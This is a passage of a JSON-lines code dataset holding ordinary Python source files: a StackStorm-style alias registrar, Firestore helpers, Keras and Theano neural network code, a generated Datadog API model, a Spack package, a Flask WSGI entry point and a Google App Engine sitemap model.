pack: %s', aliases_dir)\n\n return registered_count\n\n def register_aliases_from_pack(self, pack_dir):\n \"\"\"\n Register all the aliases from the provided pack.\n\n :return: Number of aliases registered.\n :rtype: ``int``\n \"\"\"\n pack_dir = pack_dir[:-1] if pack_dir.endswith('/') else pack_dir\n _, pack = os.path.split(pack_dir)\n aliases_dir = self._pack_loader.get_content_from_pack(pack_dir=pack_dir,\n content_type='aliases')\n\n registered_count = 0\n\n if not aliases_dir:\n return registered_count\n\n LOG.debug('Registering aliases from pack %s:, dir: %s', pack, aliases_dir)\n\n try:\n aliases = self._get_aliases_from_pack(aliases_dir=aliases_dir)\n registered_count = self._register_aliases_from_pack(pack=pack, aliases=aliases)\n except:\n LOG.exception('Failed registering all aliases from pack: %s', aliases_dir)\n return 0\n\n return registered_count\n\n def _get_aliases_from_pack(self, aliases_dir):\n return self.get_resources_from_pack(resources_dir=aliases_dir)\n\n def _register_action_alias(self, pack, action_alias):\n content = self._meta_loader.load(action_alias)\n pack_field = content.get('pack', None)\n if not pack_field:\n content['pack'] = pack\n pack_field = pack\n if pack_field != pack:\n raise Exception('Model is in pack \"%s\" but field \"pack\" is different: %s' %\n (pack, pack_field))\n\n action_alias_api = ActionAliasAPI(**content)\n action_alias_api.validate()\n action_alias_db = ActionAliasAPI.to_model(action_alias_api)\n\n try:\n action_alias_db.id = ActionAlias.get_by_name(action_alias_api.name).id\n except ValueError:\n LOG.info('ActionAlias %s not found. Creating new one.', action_alias)\n\n try:\n action_alias_db = ActionAlias.add_or_update(action_alias_db)\n extra = {'action_alias_db': action_alias_db}\n LOG.audit('Action alias updated. Action alias %s from %s.', action_alias_db,\n action_alias, extra=extra)\n except Exception:\n LOG.exception('Failed to create action alias %s.', action_alias_api.name)\n raise\n\n def _register_aliases_from_pack(self, pack, aliases):\n registered_count = 0\n\n for alias in aliases:\n try:\n LOG.debug('Loading alias from %s.', alias)\n self._register_action_alias(pack, alias)\n except Exception:\n LOG.exception('Unable to register alias: %s', alias)\n continue\n else:\n registered_count += 1\n\n return registered_count\n\n\ndef register_aliases(packs_base_paths=None, pack_dir=None):\n if packs_base_paths:\n assert(isinstance(packs_base_paths, list))\n\n if not packs_base_paths:\n packs_base_paths = content_utils.get_packs_base_paths()\n\n registrar = AliasesRegistrar()\n\n if pack_dir:\n result = registrar.register_aliases_from_pack(pack_dir=pack_dir)\n else:\n result = registrar.register_aliases_from_packs(base_dirs=packs_base_paths)\n\n return result\n"} {"ext": "py", "sha": "1a2fa31a8570b50309787abff5676b29d6214a61", "content": "import sys\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\nimport firebase_admin\nfrom firebase_admin import credentials\nimport pandas as pd\nimport numpy as np\nimport random\n# import google_cloud_firestore\nfrom google.cloud import firestore as fs\ncred = credentials.Certificate(\"./keys/firebaseAdminAuth.json\")\n\n\ndef getRestaurants():\n db = firestore.client()\n\n rst_ref = db.collection(u'root/restaurants/rstList')\n\n docs = rst_ref.stream()\n\n rst_list = []\n\n for doc in docs:\n rst_list.append(doc.id)\n # print(f'{doc.id} => {doc.to_dict()}')\n\n return rst_list\n\n\ndef checkDocument(docPath):\n db = firestore.client()\n\n doc_ref = db.document(docPath)\n\n return doc_ref.get().exists\n"} {"ext": "py", "sha": "1a2fa3427bc865b29d503ed11ce2365f0c5d78c4", "content": "# Copyright (c) 2020 Graphcore Ltd. All rights reserved.\nimport tensorflow as tf\n\nfrom tensorflow.python import ipu\n\nfrom ipu_tensorflow_addons.keras.layers import Embedding, LSTM\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.datasets import imdb\nfrom tensorflow.keras.preprocessing import sequence\nfrom tensorflow.keras.optimizers import Adam\n\nif tf.__version__[0] != '2':\n raise ImportError(\"TensorFlow 2 is required for this example\")\n\n\nmax_features = 20000\nminibatch_size = 32\n\n\n# Define the dataset.\ndef get_dataset():\n (x_train, y_train), (_, _) = imdb.load_data(num_words=max_features)\n\n x_train = sequence.pad_sequences(x_train, maxlen=80)\n\n ds = tf.data.Dataset.from_tensor_slices((x_train, y_train))\n ds = ds.repeat()\n ds = ds.map(lambda x, y: (x, tf.cast(y, tf.int32)))\n ds = ds.batch(minibatch_size, drop_remainder=True)\n return ds\n\n\n# Define the model.\ndef get_model():\n return tf.keras.Sequential(\n [Embedding(max_features, 128),\n LSTM(128, dropout=0.2),\n Dense(1, activation='sigmoid')])\n\n\ndef main():\n # Configure IPUs.\n cfg = ipu.config.IPUConfig()\n cfg.auto_select_ipus = 1\n cfg.configure_ipu_system()\n\n # Set up IPU strategy.\n strategy = ipu.ipu_strategy.IPUStrategy()\n with strategy.scope():\n\n model = get_model()\n\n model.compile(steps_per_execution=384, loss='binary_crossentropy', optimizer=Adam(0.005))\n model.fit(get_dataset(), steps_per_epoch=768, epochs=3)\n\n\nif __name__ == '__main__':\n main()\n"} {"ext": "py", "sha": "1a2fa34abd33c56738177c4aa8448cf67fd8e4b0", "content": "# Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.\n# This product includes software developed at Datadog (https://www.datadoghq.com/).\n# Copyright 2019-Present Datadog, Inc.\n\n\nimport re # noqa: F401\nimport sys # noqa: F401\n\nfrom datadog_api_client.v2.model_utils import ( # noqa: F401\n ApiTypeError,\n ModelComposed,\n ModelNormal,\n ModelSimple,\n cached_property,\n change_keys_js_to_python,\n convert_js_args_to_python_args,\n date,\n datetime,\n file_type,\n none_type,\n validate_get_composed_info,\n)\n\n\ndef lazy_import():\n from datadog_api_client.v2.model.dashboard_list_item_request import DashboardListItemRequest\n\n globals()[\"DashboardListItemRequest\"] = DashboardListItemRequest\n\n\nclass DashboardListDeleteItemsRequest(ModelNormal):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n\n Attributes:\n allowed_values (dict): The key is the tuple path to the attribute\n and the for var_name this is (var_name,). The value is a dict\n with a capitalized key describing the allowed value and an allowed\n value. These dicts store the allowed enum values.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n discriminator_value_class_map (dict): A dict to go from the discriminator\n variable value to the discriminator class name.\n validations (dict): The key is the tuple path to the attribute\n and the for var_name this is (var_name,). The value is a dict\n that stores validations for max_length, min_length, max_items,\n min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,\n inclusive_minimum, and regex.\n additional_properties_type (tuple): A tuple of classes accepted\n as additional properties values.\n \"\"\"\n\n allowed_values = {}\n\n validations = {}\n\n additional_properties_type = None\n\n _nullable = False\n\n @cached_property\n def openapi_types():\n \"\"\"\n This must be a method because a model may have properties that are\n of type self, this must run after the class is loaded\n\n Returns\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n \"\"\"\n lazy_import()\n return {\n \"dashboards\": ([DashboardListItemRequest],), # noqa: E501\n }\n\n @cached_property\n def discriminator():\n return None\n\n attribute_map = {\n \"dashboards\": \"dashboards\", # noqa: E501\n }\n\n _composed_schemas = {}\n\n required_properties = set(\n [\n \"_data_store\",\n \"_check_type\",\n \"_spec_property_naming\",\n \"_path_to_item\",\n \"_configuration\",\n \"_visited_composed_classes\",\n ]\n )\n\n @convert_js_args_to_python_args\n def __init__(self, *args, **kwargs): # noqa: E501\n \"\"\"DashboardListDeleteItemsRequest - a model defined in OpenAPI\n\n Keyword Args:\n _check_type (bool): if True, values for parameters in openapi_types\n will be type checked and a TypeError will be\n raised if the wrong type is input.\n Defaults to True\n _path_to_item (tuple/list): This is a list of keys or values to\n drill down to the model in received_data\n when deserializing a response\n _spec_property_naming (bool): True if the variable names in the input data\n are serialized names, as specified in the OpenAPI document.\n False if the variable names in the input data\n are pythonic names, e.g. snake case (default)\n _configuration (Configuration): the instance to use when\n deserializing a file_type parameter.\n If passed, type conversion is attempted\n If omitted no type conversion is done.\n _visited_composed_classes (tuple): This stores a tuple of\n classes that we have traveled through so that\n if we see that class again we will not use its\n discriminator again.\n When traveling through a discriminator, the\n composed schema that is\n is traveled through is added to this set.\n For example if Animal has a discriminator\n petType and we pass in \"Dog\", and the class Dog\n allOf includes Animal, we move through Animal\n once using the discriminator, and pick Dog.\n Then in Dog, we will make an instance of the\n Animal class but this time we won't travel\n through its discriminator because we passed in\n _visited_composed_classes = (Animal,)\n dashboards ([DashboardListItemRequest]): List of dashboards to delete from the dashboard list.. [optional] # noqa: E501\n \"\"\"\n\n _check_type = kwargs.pop(\"_check_type\", True)\n _spec_property_naming = kwargs.pop(\"_spec_property_naming\", False)\n _path_to_item = kwargs.pop(\"_path_to_item\", ())\n _configuration = kwargs.pop(\"_configuration\", None)\n _visited_composed_classes = kwargs.pop(\"_visited_composed_classes\", ())\n\n if args:\n raise ApiTypeError(\n \"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.\"\n % (\n args,\n self.__class__.__name__,\n ),\n path_to_item=_path_to_item,\n valid_classes=(self.__class__,),\n )\n\n self._data_store = {}\n self._check_type = _check_type\n self._spec_property_naming = _spec_property_naming\n self._path_to_item = _path_to_item\n self._configuration = _configuration\n self._visited_composed_classes = _visited_composed_classes + (self.__class__,)\n\n for var_name, var_value in kwargs.items():\n if (\n var_name not in self.attribute_map\n and self._configuration is not None\n and self._configuration.discard_unknown_keys\n and self.additional_properties_type is None\n ):\n # discard variable.\n continue\n setattr(self, var_name, var_value)\n"} {"ext": "py", "sha": "1a2fa3ede57f67addf10c8752e0b455a74edc0de", "content": "from .claims import Claims\nfrom .cose import COSE\nfrom .cose_key import COSEKey\nfrom .cwt import (\n CWT,\n decode,\n encode,\n encode_and_encrypt,\n encode_and_mac,\n encode_and_sign,\n set_private_claim_names,\n)\nfrom .encrypted_cose_key import EncryptedCOSEKey\nfrom .exceptions import CWTError, DecodeError, EncodeError, VerifyError\nfrom .helpers.hcert import load_pem_hcert_dsc\nfrom .recipient import Recipient\nfrom .signer import Signer\n\n__version__ = \"1.3.2\"\n__title__ = \"cwt\"\n__description__ = \"A Python implementation of CWT/COSE\"\n__url__ = \"https://python-cwt.readthedocs.io\"\n__uri__ = __url__\n__doc__ = __description__ + \" <\" + __uri__ + \">\"\n__author__ = \"AJITOMI Daisuke\"\n__email__ = \"ajitomi@gmail.com\"\n__license__ = \"MIT\"\n__copyright__ = \"Copyright 2021 AJITOMI Daisuke\"\n__all__ = [\n \"encode\",\n \"encode_and_mac\",\n \"encode_and_sign\",\n \"encode_and_encrypt\",\n \"decode\",\n \"set_private_claim_names\",\n \"CWT\",\n \"COSE\",\n \"COSEKey\",\n \"EncryptedCOSEKey\",\n \"Claims\",\n \"Recipient\",\n \"Signer\",\n \"load_pem_hcert_dsc\",\n \"CWTError\",\n \"EncodeError\",\n \"DecodeError\",\n \"VerifyError\",\n]\n"} {"ext": "py", "sha": "1a2fa456371772b9300572a23d9fc92c7cc9be8a", "content": "# Copyright 2013-2018 Lawrence Livermore National Security, LLC and other\n# Spack Project Developers. See the top-level COPYRIGHT file for details.\n#\n# SPDX-License-Identifier: (Apache-2.0 OR MIT)\n\nfrom spack import *\n\n\nclass Pacvim(MakefilePackage):\n \"\"\"Pacvim is a command-line-based game based off of Pacman.\n The main purpose of this software is to familiarize individuals\n with Vim.\"\"\"\n\n homepage = \"https://github.com/jmoon018/PacVim\"\n url = \"https://github.com/jmoon018/PacVim/archive/v1.1.1.tar.gz\"\n\n version('1.1.1', sha256='c869c5450fbafdfe8ba8a8a9bba3718775926f276f0552052dcfa090d21acb28')\n\n depends_on('ncurses')\n\n def edit(self, stage, prefix):\n makefile = FileFilter('Makefile')\n\n makefile.filter(r'PREFIX = /usr/local',\n 'PREFIX={0}'.format(self.prefix))\n"} {"ext": "py", "sha": "1a2fa50945f1a6c08082b410417c53dee9e84e86", "content": "#!/usr/bin/python3.6\n\nactivate_this = '/home/ubuntu/flaskapp/venv/bin/activate_this.py'\nwith open(activate_this) as f:\n exec(f.read(), dict(__file__=activate_this))\n\nimport sys\nimport logging\nlogging.basicConfig(stream=sys.stderr)\nsys.path.insert(0,\"/home/ubuntu/flaskapp/flaskapp/\")\n\nfrom manage import app as application\n\nif __name__ == \"__main__\":\n application.run()\n"} {"ext": "py", "sha": "1a2fa5e57cb4657488deed52fa03fa55c4854aa3", "content": "# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nimport theano\nimport theano.tensor as T\nimport numpy as np\n\nfrom .. import activations, initializations\nfrom ..utils.theano_utils import shared_zeros, alloc_zeros_matrix\nfrom ..layers.core import Layer\nfrom .. import regularizers\n\nfrom six.moves import range\n\n\nclass BLSTM(Layer):\n def __init__(self, input_dim, output_dim,\n init='glorot_uniform', inner_init='orthogonal',\n activation='tanh', inner_activation='hard_sigmoid',\n weights=None, truncate_gradient=-1, return_sequences=False,\n is_entity=False, regularize=False):\n\n self.is_entity = is_entity\n self.input_dim = input_dim\n self.output_dim = output_dim\n self.truncate_gradient = truncate_gradient\n self.return_sequences = return_sequences\n\n self.init = initializations.get(init)\n self.inner_init = initializations.get(inner_init)\n self.activation = activations.get(activation)\n self.inner_activation = activations.get(inner_activation)\n self.input = T.tensor3()\n\n self.W_if = self.init((self.input_dim, self.output_dim))\n self.W_ib = self.init((self.input_dim, self.output_dim))\n self.U_if = self.inner_init((self.output_dim, self.output_dim))\n self.U_ib = self.inner_init((self.output_dim, self.output_dim))\n self.b_if = shared_zeros((self.output_dim))\n self.b_ib = shared_zeros((self.output_dim))\n\n self.W_ff = self.init((self.input_dim, self.output_dim))\n self.W_fb = self.init((self.input_dim, self.output_dim))\n self.U_ff = self.inner_init((self.output_dim, self.output_dim))\n self.U_fb = self.inner_init((self.output_dim, self.output_dim))\n self.b_ff = shared_zeros((self.output_dim))\n self.b_fb = shared_zeros((self.output_dim))\n\n self.W_cf = self.init((self.input_dim, self.output_dim))\n self.W_cb = self.init((self.input_dim, self.output_dim))\n self.U_cf = self.inner_init((self.output_dim, self.output_dim))\n self.U_cb = self.inner_init((self.output_dim, self.output_dim))\n self.b_cf = shared_zeros((self.output_dim))\n self.b_cb = shared_zeros((self.output_dim))\n\n self.W_of = self.init((self.input_dim, self.output_dim))\n self.W_ob = self.init((self.input_dim, self.output_dim))\n self.U_of = self.inner_init((self.output_dim, self.output_dim))\n self.U_ob = self.inner_init((self.output_dim, self.output_dim))\n self.b_of = shared_zeros((self.output_dim))\n self.b_ob = shared_zeros((self.output_dim))\n\n self.W_yf = self.init((self.output_dim, self.output_dim))\n self.W_yb = self.init((self.output_dim, self.output_dim))\n #self.W_y = self.init((self.output_dim, self.output_dim))\n self.b_y = shared_zeros((self.output_dim))\n\n self.params = [\n self.W_if, self.U_if, self.b_if,\n self.W_ib, self.U_ib, self.b_ib,\n\n self.W_cf, self.U_cf, self.b_cf,\n self.W_cb, self.U_cb, self.b_cb,\n\n self.W_ff, self.U_ff, self.b_ff,\n self.W_fb, self.U_fb, self.b_fb,\n\n self.W_of, self.U_of, self.b_of,\n self.W_ob, self.U_ob, self.b_ob,\n\n self.W_yf, self.W_yb, self.b_y\n #self.W_y, self.b_y\n ]\n if regularize:\n self.regularizers = []\n for i in self.params:\n self.regularizers.append(regularizers.my_l2)\n\n if weights is not None:\n self.set_weights(weights)\n\n def _step(self,\n xi_t, xf_t, xo_t, xc_t,\n h_tm1, c_tm1,\n u_i, u_f, u_o, u_c):\n i_t = self.inner_activation(xi_t + T.dot(h_tm1, u_i))\n f_t = self.inner_activation(xf_t + T.dot(h_tm1, u_f))\n c_t = f_t * c_tm1 + i_t * self.activation(xc_t + T.dot(h_tm1, u_c))\n o_t = self.inner_activation(xo_t + T.dot(h_tm1, u_o))\n h_t = o_t * self.activation(c_t)\n return h_t, c_t\n\n def output(self, train):\n X = self.get_input(train)\n X = X.dimshuffle((1,0,2))\n\n\n if self.is_entity:\n Entity = X[-1:].dimshuffle(1,0,2)\n X = X[:-1]\n\n b_y = self.b_y\n b_yn = T.repeat(T.repeat(b_y.reshape((1,self.output_dim)),X.shape[0],axis=0).reshape((1,X.shape[0],self.output_dim)), X.shape[1], axis=0)\n\n xif = T.dot(X, self.W_if) + self.b_if\n xib = T.dot(X, self.W_ib) + self.b_ib\n\n xff = T.dot(X, self.W_ff) + self.b_ff\n xfb = T.dot(X, self.W_fb) + self.b_fb\n\n xcf = T.dot(X, self.W_cf) + self.b_cf\n xcb = T.dot(X, self.W_cb) + self.b_cb\n\n xof = T.dot(X, self.W_of) + self.b_of\n xob = T.dot(X, self.W_ob) + self.b_ob\n\n [outputs_f, memories_f], updates_f = theano.scan(\n self._step,\n sequences=[xif, xff, xof, xcf],\n outputs_info=[\n alloc_zeros_matrix(X.shape[1], self.output_dim),\n alloc_zeros_matrix(X.shape[1], self.output_dim)\n ],\n non_sequences=[self.U_if, self.U_ff, self.U_of, self.U_cf],\n truncate_gradient=self.truncate_gradient\n )\n [outputs_b, memories_b], updates_b = theano.scan(\n self._step,\n sequences=[xib, xfb, xob, xcb],\n outputs_info=[\n alloc_zeros_matrix(X.shape[1], self.output_dim),\n alloc_zeros_matrix(X.shape[1], self.output_dim)\n ],\n non_sequences=[self.U_ib, self.U_fb, self.U_ob, self.U_cb],\n truncate_gradient=self.truncate_gradient\n )\n if self.return_sequences:\n y = T.add(T.add(\n T.tensordot(outputs_f.dimshuffle((1,0,2)), self.W_yf, [[2],[0]]),\n T.tensordot(outputs_b[::-1].dimshuffle((1,0,2)), self.W_yb, [[2],[0]])),\n b_yn)\n # y = T.add(T.tensordot(\n # T.add(outputs_f.dimshuffle((1, 0, 2)),\n # outputs_b[::-1].dimshuffle((1,0,2))),\n # self.W_y,[[2],[0]]),b_yn)\n if self.is_entity:\n return T.concatenate([y, Entity], axis=1)\n else:\n return y\n return T.concatenate((outputs_f[-1], outputs_b[0]))\n\n def get_config(self):\n return {\"name\":self.__class__.__name__,\n \"input_dim\":self.input_dim,\n \"output_dim\":self.output_dim,\n \"init\":self.init.__name__,\n \"inner_init\":self.inner_init.__name__,\n \"activation\":self.activation.__name__,\n \"truncate_gradient\":self.truncate_gradient,\n \"return_sequences\":self.return_sequences}\n\n\nclass BRNN(Layer):\n '''\n Fully connected Bi-directional RNN where:\n Output at time=t is fed back to input for time=t+1 in a forward pass\n Output at time=t is fed back to input for time=t-1 in a backward pass\n '''\n def __init__(self, input_dim, output_dim,\n init='uniform', inner_init='orthogonal', activation='sigmoid', weights=None,\n truncate_gradient=-1, return_sequences=False, is_entity=False, regularize=False):\n #whyjay\n self.is_entity = is_entity\n\n self.init = initializations.get(init)\n self.inner_init = initializations.get(inner_init)\n self.input_dim = input_dim\n self.output_dim = output_dim\n self.truncate_gradient = truncate_gradient\n self.activation = activations.get(activation)\n self.return_sequences = return_sequences\n self.input = T.tensor3()\n self.W_o = self.init((self.input_dim, self.output_dim))\n self.W_if = self.init((self.input_dim, self.output_dim)) # Input -> Forward\n self.W_ib = self.init((self.input_dim, self.output_dim)) # Input -> Backward\n self.W_ff = self.init((self.output_dim, self.output_dim)) # Forward tm1 -> Forward t\n self.W_bb = self.init((self.output_dim, self.output_dim)) # Backward t -> Backward tm1\n self.b_if = shared_zeros((self.output_dim))\n self.b_ib = shared_zeros((self.output_dim))\n self.b_f = shared_zeros((self.output_dim))\n self.b_b = shared_zeros((self.output_dim))\n self.b_o = shared_zeros((self.output_dim))\n self.params = [self.W_o,self.W_if,self.W_ib, self.W_ff, self.W_bb,self.b_if,self.b_ib, self.b_f, self.b_b, self.b_o]\n\n if regularize:\n self.regularizers = []\n for i in self.params:\n self.regularizers.append(regularizers.my_l2)\n\n if weights is not None:\n self.set_weights(weights)\n\n def _step(self, x_t, h_tm1, u,b):\n return self.activation(x_t + T.dot(h_tm1, u)+b)\n\n def output(self, train):\n X = self.get_input(train) # shape: (nb_samples, time (padded with zeros at the end), input_dim)\n # new shape: (time, nb_samples, input_dim) -> because theano.scan iterates over main dimension\n X = X.dimshuffle((1, 0, 2))\n\n if self.is_entity:\n lenX=X.shape[0]\n Entity=X[lenX-1:].dimshuffle(1,0,2)\n X=X[:lenX-1]\n\n xf = self.activation(T.dot(X, self.W_if) + self.b_if)\n xb = self.activation(T.dot(X, self.W_ib) + self.b_ib)\n b_o=self.b_o\n b_on= T.repeat(T.repeat(b_o.reshape((1,self.output_dim)),X.shape[0],axis=0).reshape((1,X.shape[0],self.output_dim)),X.shape[1],axis=0)\n\n # Iterate forward over the first dimension of the x array (=time).\n outputs_f, updates_f = theano.scan(\n self._step, # this will be called with arguments (sequences[i], outputs[i-1], non_sequences[i])\n sequences=xf, # tensors to iterate over, inputs to _step\n # initialization of the output. Input to _step with default tap=-1.\n outputs_info=alloc_zeros_matrix(X.shape[1], self.output_dim),\n non_sequences=[self.W_ff,self.b_f], # static inputs to _step\n truncate_gradient=self.truncate_gradient\n )\n # Iterate backward over the first dimension of the x array (=time).\n outputs_b, updates_b = theano.scan(\n self._step, # this will be called with arguments (sequences[i], outputs[i-1], non_sequences[i])\n sequences=xb, # tensors to iterate over, inputs to _step\n # initialization of the output. Input to _step with default tap=-1.\n outputs_info=alloc_zeros_matrix(X.shape[1], self.output_dim),\n non_sequences=[self.W_bb,self.b_b], # static inputs to _step\n truncate_gradient=self.truncate_gradient,\n go_backwards=True # Iterate backwards through time\n )\n #return outputs_f.dimshuffle((1, 0, 2))\n if self.return_sequences:\n if self.is_entity:\n return T.concatenate([T.add(T.tensordot(T.add(outputs_f.dimshuffle((1, 0, 2)), outputs_b[::-1].dimshuffle((1,0,2))),self.W_o,[[2],[0]]),b_on),Entity],axis=1)\n else:\n return T.add(T.tensordot(T.add(outputs_f.dimshuffle((1, 0, 2)), outputs_b[::-1].dimshuffle((1,0,2))),self.W_o,[[2],[0]]),b_on)\n\n return T.concatenate((outputs_f[-1], outputs_b[0]))\n\n def get_config(self):\n return {\"name\":self.__class__.__name__,\n \"input_dim\":self.input_dim,\n \"output_dim\":self.output_dim,\n \"init\":self.init.__name__,\n \"inner_init\":self.inner_init.__name__,\n \"activation\":self.activation.__name__,\n \"truncate_gradient\":self.truncate_gradient,\n \"return_sequences\":self.return_sequences}\n\n"} {"ext": "py", "sha": "1a2fa736ea02f74aecb934a198adf2cbb76fca03", "content": "import _plotly_utils.basevalidators\n\n\nclass SmoothingValidator(_plotly_utils.basevalidators.NumberValidator):\n def __init__(self, plotly_name=\"smoothing\", parent_name=\"carpet.aaxis\", **kwargs):\n super(SmoothingValidator, self).__init__(\n plotly_name=plotly_name,\n parent_name=parent_name,\n edit_type=kwargs.pop(\"edit_type\", \"calc\"),\n max=kwargs.pop(\"max\", 1.3),\n min=kwargs.pop(\"min\", 0),\n **kwargs,\n )\n"} {"ext": "py", "sha": "1a2fa73a21c9d5f030cc677eaa4d27eaf9c8c2e2", "content": "import numpy as np\n\nfrom finitewave.core.model import CardiacModel\nfrom finitewave.cpuwave2D.model.aliev_panfilov_2d.aliev_panfilov_kernels_2d \\\n import AlievPanfilovKernels2D\n\n_npfloat = \"float64\"\n\n\nclass AlievPanfilov2D(CardiacModel):\n def __init__(self):\n CardiacModel.__init__(self)\n self.v = np.ndarray\n self.w = np.ndarray\n self.state_vars = [\"u\", \"v\"]\n self.npfloat = 'float64'\n\n def initialize(self):\n super().initialize()\n weights_shape = self.cardiac_tissue.weights.shape\n shape = self.cardiac_tissue.mesh.shape\n self.diffuse_kernel = AlievPanfilovKernels2D().get_diffuse_kernel(weights_shape)\n self.ionic_kernel = AlievPanfilovKernels2D().get_ionic_kernel()\n self.v = np.zeros(shape, dtype=self.npfloat)\n\n def run_ionic_kernel(self):\n self.ionic_kernel(self.u_new, self.u, self.v, self.cardiac_tissue.mesh,\n self.dt)\n"} {"ext": "py", "sha": "1a2fa9bc071c85c8c01ed2af30bf00fb42c6360b", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nMain \n\nCreated on Tue Aug 17 14:16:44 2021\nVersion: 1.0\nUniversidad Santo Tomás Tunja\nSimulation\n@author: Juana Valentina Mendoza Santamaría\n@author: Alix Ivonne Chaparro Vasquez\npresented to: Martha Susana Contreras Ortiz\n\"\"\" \nfrom controllers.settings import config\nfrom controllers.mainController import mainController\n\nif __name__ == \"__main__\":\n simulator = config.PARAMETERS['simulator']\n mainController(simulator) # True (simulation) - False (Demo)"} {"ext": "py", "sha": "1a2fad3f3ec070c73e65b6b03c43e2f696851309", "content": "# TIPS: only used to find the best epoch of MLP\n\n# MLP\nimport csv\nfrom itertools import islice\nimport random\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.neural_network import MLPRegressor\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import KFold, train_test_split\nimport pandas as pd\nfrom sklearn.utils import shuffle\n\nimport tensorflow as tf\n\n\ndef bit2attr(bitstr) -> list:\n attr_vec = list()\n for i in range(len(bitstr)):\n attr_vec.append(int(bitstr[i]))\n return attr_vec\n\ndef mean_relative_error(y_pred, y_test):\n assert len(y_pred) == len(y_test)\n mre = 0.0\n for i in range(len(y_pred)):\n mre = mre + abs((y_pred[i] - y_test[i]) / y_test[i])\n mre = mre * 100/ len(y_pred)\n return mre\n\nLarge_MRE_points = pd.DataFrame()\nLarge_MRE_X = []\nLarge_MRE_y_test = []\nLarge_MRE_y_pred = []\nLarge_MRE = []\n\n'''\n1) 数据预处理\n'''\n# filepath = 'data/fp/sjn/R+B+Cmorgan_fp1202.csv'\nfilepath = 'data/database/22-01-29-descriptor-train.csv'\n\ndata = pd.read_csv(filepath, encoding='gb18030')\nprint(data.shape)\ndata = data.dropna()\n\nprint(data.shape)\ndata = shuffle(data)\n\ndata_x_df = data.drop(['label'], axis=1)\ndata_y_df = data[['label']]\n\n# 归一化\nmin_max_scaler_X = MinMaxScaler()\nmin_max_scaler_X.fit(data_x_df)\nx_trans1 = min_max_scaler_X.transform(data_x_df)\n\nmin_max_scaler_y = MinMaxScaler()\nmin_max_scaler_y.fit(data_y_df)\ny_trans1 = min_max_scaler_y.transform(data_y_df)\n\ntest_filepath = \"data/database/22-01-29-descriptor-test-level-1.csv\"\ntest_data = pd.read_csv(test_filepath, encoding='gb18030')\nprint('test data: ', test_data.shape)\n\ntest_data_x_df = test_data.drop(['label'], axis=1)\ntest_data_y_df = test_data[['label']]\nx_trans1_test = min_max_scaler_X.transform(test_data_x_df)\ny_trans1_test = min_max_scaler_y.transform(test_data_y_df)\n\n'''\n3) 构建模型\n'''\n\nfrom keras.layers import MaxPooling1D, Conv1D, Dense, Flatten, Dropout\nfrom keras import models\nfrom keras.optimizers import Adam, RMSprop, SGD\n\ndef buildModel():\n model = models.Sequential()\n\n l4 = Dense(512, activation='relu')\n l5 = Dropout(rate=0.2)\n l6 = Dense(128, activation='relu')\n l7 = Dense(30, activation='relu')\n l8 = Dense(1)\n\n layers = [l4, l5, l6, l7, l8]\n for i in range(len(layers)):\n model.add(layers[i])\n\n adam = Adam(lr=1e-3)\n model.compile(optimizer=adam, loss='logcosh', metrics=['mae', 'mape'])\n\n model_mlp = MLPRegressor(\n hidden_layer_sizes=(512, 128, 32), activation='relu', solver='lbfgs', alpha=0.0001,\n max_iter=5000,\n random_state=1, tol=0.0001, verbose=False, warm_start=False)\n\n return model\n\ndef scheduler(epoch, lr):\n if epoch > 0 and epoch % 500 == 0:\n return lr * 0.1\n else:\n return lr\n\n'''\n4) 训练模型\n'''\nfrom sklearn import metrics\n\n# n_split = 10\nmlp_scores = []\nMAEs = []\nout_MAEs = []\n\nin_y_test = []\nin_y_pred = []\nout_y_test = []\nout_y_pred = []\n\nX_train = x_trans1\ny_train = y_trans1\n\n# 外部验证\nX_test = x_trans1_test\n\ny_trans1_test = np.reshape(y_trans1_test, (-1, 1))\ny_test = y_trans1_test\n\n\ncallback = tf.keras.callbacks.LearningRateScheduler(scheduler, verbose=1)\nmodel_mlp = buildModel()\nhistory = model_mlp.fit(X_train, y_train, epochs=1, verbose=1, validation_data=(X_test, y_test), callbacks=[callback])\nprint(model_mlp.summary())\nexit(0)\n\nlosses = history.history['loss']\neval_mres = history.history['val_mape']\n\nfig, ax1 = plt.subplots()\nax2 = ax1.twinx()\nax1.plot([x for x in range(len(losses))], losses, 'b', label='loss')\nax1.set_ylabel('loss', color='b')\nax2.plot([x for x in range(len(eval_mres))], eval_mres, 'r', label='eval_mre')\nax2.set_ylabel('eval_mre', color='r')\nax1.set_xlabel('epochs')\nplt.title('Training of MLP')\nplt.savefig('pics/Training_of_MLP.png')\n\nimport os\noutdir = 'Out/losses_and_mres'\nos.makedirs(outdir, exist_ok=True)\nwith open(os.path.join(outdir, 'mlp_descriptor.txt'), 'w') as f:\n f.write('loss\\n')\n f.write(' '.join([str(x) for x in losses]))\n f.write('\\n')\n f.write('mres\\n')\n f.write(' '.join([str(x) for x in eval_mres]))"} {"ext": "py", "sha": "1a2fada21c09f8bf65d23747a1211aeb7930ea13", "content": "import logging\n\nfrom google.appengine.ext import db\nfrom google.appengine.api import memcache\nfrom app.utility.utils import memcached\n\nimport app.utility.utils as utils\nimport app.db.counter as counter\n\nimport web\n\nQUESTIONS_PER_SITEMAP = 500\n\n\nclass Sitemap(db.Model):\n question_count = db.IntegerProperty(default = 0)\n question_keys = db.StringListProperty(default = []) \n content = db.TextProperty(default ='')\n archived = db.BooleanProperty(default = False)\n created = db.DateTimeProperty(auto_now_add = True)\n last_modified = db.DateTimeProperty(auto_now = True)\n \n @staticmethod\n def get_last_sitemap():\n entity = Sitemap.all().order('-created').get()\n if entity:\n if entity.question_count >= QUESTIONS_PER_SITEMAP:\n entity.content = unicode(web.render.sitemap_questions(entity.question_keys))\n entity.archived = True\n entity.put()\n entity = Sitemap()\n entity.put()\n else:\n entity = Sitemap()\n entity.put()\n return entity\n \n @staticmethod\n def update_last_sitemap(key):\n last_sitemap = Sitemap.get_last_sitemap()\n 